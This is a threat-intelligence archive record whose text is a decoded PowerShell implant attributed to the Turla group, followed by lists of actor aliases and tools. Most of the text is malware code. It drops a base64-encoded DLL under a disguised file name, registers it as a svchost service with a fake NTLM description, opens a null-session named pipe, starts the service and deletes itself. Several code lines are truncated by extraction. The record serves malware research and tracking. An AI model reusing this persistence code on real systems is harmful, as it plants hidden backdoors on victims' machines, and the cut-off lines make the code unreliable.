{ "id": "b6010c24-a941-47c1-9993-9acf496a9756", "created_at": "2026-04-06T00:17:46.785179Z", "updated_at": "2026-04-10T13:12:17.649405Z", "deleted_at": null, "sha1_hash": "7a6c2758ab6d57566892cf41e4729459ab58c991", "title": "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 39873, "plain_text": "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1\r\nArchived: 2026-04-05 19:36:00 UTC\r\n// @VK_INTEL\r\n// MD5: 165be7620b78fe37cf25c797ee5b49e7\r\n// POSSIBLE TURLA DECODED POWERSHELL IMPLANT\r\n/*\r\nGENERAL FLOW:\r\nFindAmsiFun() -\u003e Zip -\u003e PowerSploit-Encoded -\u003e\r\nC:\\Windows\\security\\database\\securlsa.chk serveName 'pnrss' \u0026 pipeName = 'pnrsvc' Persistence\r\nPowerShellRunner.dll\r\n*/\r\n/*\r\nBASE64 POWERSHELLRUNNER\r\n$LDD761jbd = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAA4\r\n*/\r\nSet-Content 'C:\\Windows\\security\\database\\securlsa.chk' -Value $([Convert]::FromBase64String($LDD761j\r\n[string]$servName='pnrssp';\r\n[string]$fileName='securlsa.chk';\r\n[string]$pipeName = 'pnrsvc';\r\nfunction Reg-SetMS($registry, [string]$valueName, [string]$value)\r\n{\r\n[string[]]$array = $registry.GetValue($valueName)\r\nIf ($array -notcontains $value) {\r\n$array += $value\r\n$registry.SetValue($valueName, $array, 'MultiString')\r\n}\r\n}\r\nfunction Reg-DelMS($registry, [string]$valueName, $value)\r\n{\r\n$array = $registry.GetValue($valueName)\r\n[string[]]$newarray = $array -ne $value\r\n$registry.SetValue($valueName, $newarray, 'MultiString')\r\n}\r\nhttps://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1\r\nPage 1 of 2\n\nfunction Install([string]$servName, [string]$fileName, [string]$pipeName)\r\n{\r\n$serviceMain = \"ServiceMain\"\r\n$serviceDll = \"ServiceDLL\"\r\nNew-Service -Name $servName -BinaryPathName \"%SystemRoot%\\system32\\svchost.exe -k netsvcs\" -D\r\n-Description \"Uses the NTLM MS-CHAP protocol to encapsulate and negot\r\n$registry = (Get-Item -Path Registry::HKLM).OpenSubKey(\"SOFTWARE\\Microsoft\\Windows NT\\Current\r\nReg-SetMS $registry \"netsvcs\" $servName\r\n$registry.Close()\r\n$registry = (Get-Item -Path Registry::HKLM).OpenSubKey(\"SYSTEM\\CurrentControlSet\\services\\$se\r\n$registry.SetValue($serviceMain, $serviceMain, 'String')\r\n$registry.SetValue($serviceDll, $env:SystemRoot + '\\security\\database\\' + $fileName, 'ExpandS\r\n$registry.Close()\r\nif ($pipeName -ne $null)\r\n{\r\n$registry = (Get-Item -Path Registry::HKLM).OpenSubKey(\"SYSTEM\\CurrentControlSet\\serv\r\nReg-SetMS $registry \"NullSessionPipes\" $pipeName\r\n$registry.Close()\r\n}\r\nStart-Service -Name $servName\r\n}\r\ntry\r\n{\r\nInstall $servName $fileName $pipeName\r\necho \"Success\"\r\n}\r\ncatch\r\n{\r\necho \"Exception Type: $($_.Exception.GetType().FullName)\"\r\necho \"Exception Message: $($_.Exception.Message)\"\r\n}\r\nRemove-Item -LiteralPath $MyInvocation.MyCommand.Path -Force\r\nSource: https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1\r\nhttps://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1\r\nPage 2 of 2", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-04-13-Possible-Turla-PowerShell-Implant.ps1" ], "report_names": [ "2019-04-13-Possible-Turla-PowerShell-Implant.ps1" ], "threat_actors": [ { "id": "8aaa5515-92dd-448d-bb20-3a253f4f8854", "created_at": "2024-06-19T02:03:08.147099Z", "updated_at": "2026-04-10T02:00:03.685355Z", "deleted_at": null, "main_name": "IRON HUNTER", "aliases": [ "ATK13 ", "Belugasturgeon ", "Blue Python ", "CTG-8875 ", "ITG12 ", "KRYPTON ", "MAKERSMARK ", "Pensive Ursa ", "Secret Blizzard ", "Turla", "UAC-0003 ", "UAC-0024 ", "UNC4210 ", "Venomous Bear ", "Waterbug " ], "source_name": "Secureworks:IRON HUNTER", "tools": [ "Carbon-DLL", "ComRAT", "LightNeuron", "Mosquito", "PyFlash", "Skipper", "Snake", "Tavdig" ], "source_id": "Secureworks", "reports": null }, { "id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac", "created_at": "2022-10-25T16:07:24.349252Z", "updated_at": "2026-04-10T02:00:04.949821Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "ATK 13", "Belugasturgeon", "Blue Python", "CTG-8875", "G0010", "Group 88", "ITG12", "Iron Hunter", "Krypton", "Makersmark", "Operation Epic Turla", "Operation Moonlight Maze", "Operation Penguin Turla", "Operation Satellite Turla", "Operation Skipper Turla", "Operation Turla Mosquito", "Operation WITCHCOVEN", "Pacifier APT", "Pensive Ursa", "Popeye", "SIG15", "SIG2", "SIG23", "Secret Blizzard", "TAG-0530", "Turla", "UNC4210", "Venomous Bear", "Waterbug" ], "source_name": "ETDA:Turla", "tools": [ "ASPXSpy", "ASPXTool", "ATI-Agent", "AdobeARM", "Agent.BTZ", "Agent.DNE", "ApolloShadow", "BigBoss", "COMpfun", "Chinch", "Cloud Duke", "CloudDuke", "CloudLook", "Cobra Carbon System", "ComRAT", "DoublePulsar", "EmPyre", "EmpireProject", "Epic Turla", "EternalBlue", "EternalRomance", "GoldenSky", "Group Policy Results Tool", "HTML5 Encoding", "HyperStack", "IcedCoffee", "IronNetInjector", "KSL0T", "Kapushka", "Kazuar", "KopiLuwak", "Kotel", "LOLBAS", "LOLBins", "LightNeuron", "Living off the Land", "Maintools.js", "Metasploit", "Meterpreter", "MiamiBeach", "Mimikatz", "MiniDionis", "Minit", "NBTscan", "NETTRANS", "NETVulture", "Neptun", "NetFlash", "NewPass", "Outlook Backdoor", "Penquin Turla", "Pfinet", "PowerShell Empire", "PowerShellRunner", "PowerShellRunner-based RPC backdoor", "PowerStallion", "PsExec", "PyFlash", "QUIETCANARY", "Reductor RAT", "RocketMan", "SMBTouch", "SScan", "Satellite Turla", "SilentMoon", "Sun rootkit", "TTNG", "TadjMakhal", "Tavdig", "TinyTurla", "TinyTurla Next Generation", "TinyTurla-NG", "Topinambour", "Tunnus", "Turla", "Turla SilentMoon", "TurlaChopper", "Uroburos", "Urouros", "WCE", "WITCHCOVEN", "WhiteAtlas", "WhiteBear", "Windows Credential Editor", "Windows Credentials Editor", "Wipbot", "WorldCupSec", "XTRANS", "certutil", "certutil.exe", "gpresult", "nbtscan", "nbtstat", "pwdump" ], "source_id": "ETDA", "reports": null }, { "id": "a97fee0d-af4b-4661-ae17-858925438fc4", "created_at": "2023-01-06T13:46:38.396415Z", "updated_at": "2026-04-10T02:00:02.957137Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "TAG_0530", "Pacifier APT", "Blue Python", "UNC4210", "UAC-0003", "VENOMOUS Bear", "Waterbug", "Pfinet", "KRYPTON", "Popeye", "SIG23", "ATK13", "ITG12", "Group 88", "Uroburos", "Hippo Team", "IRON HUNTER", "MAKERSMARK", "Secret Blizzard", "UAC-0144", "UAC-0024", "G0010" ], "source_name": "MISPGALAXY:Turla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3", "created_at": "2022-10-25T15:50:23.509601Z", "updated_at": "2026-04-10T02:00:05.277674Z", "deleted_at": null, "main_name": "Turla", "aliases": [ "Turla", "IRON HUNTER", "Group 88", "Waterbug", "WhiteBear", "Krypton", "Venomous Bear", "Secret Blizzard", "BELUGASTURGEON" ], "source_name": "MITRE:Turla", "tools": [ "PsExec", "nbtstat", "ComRAT", "netstat", "certutil", "KOPILUWAK", "IronNetInjector", "LunarWeb", "Arp", "Uroburos", "PowerStallion", "Kazuar", "Systeminfo", "LightNeuron", "Mimikatz", "Tasklist", "LunarMail", "HyperStack", "NBTscan", "TinyTurla", "Penquin", "LunarLoader" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434666, "ts_updated_at": 1775826737, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/7a6c2758ab6d57566892cf41e4729459ab58c991.pdf", "text": "https://archive.orkl.eu/7a6c2758ab6d57566892cf41e4729459ab58c991.txt", "img": "https://archive.orkl.eu/7a6c2758ab6d57566892cf41e4729459ab58c991.jpg" } }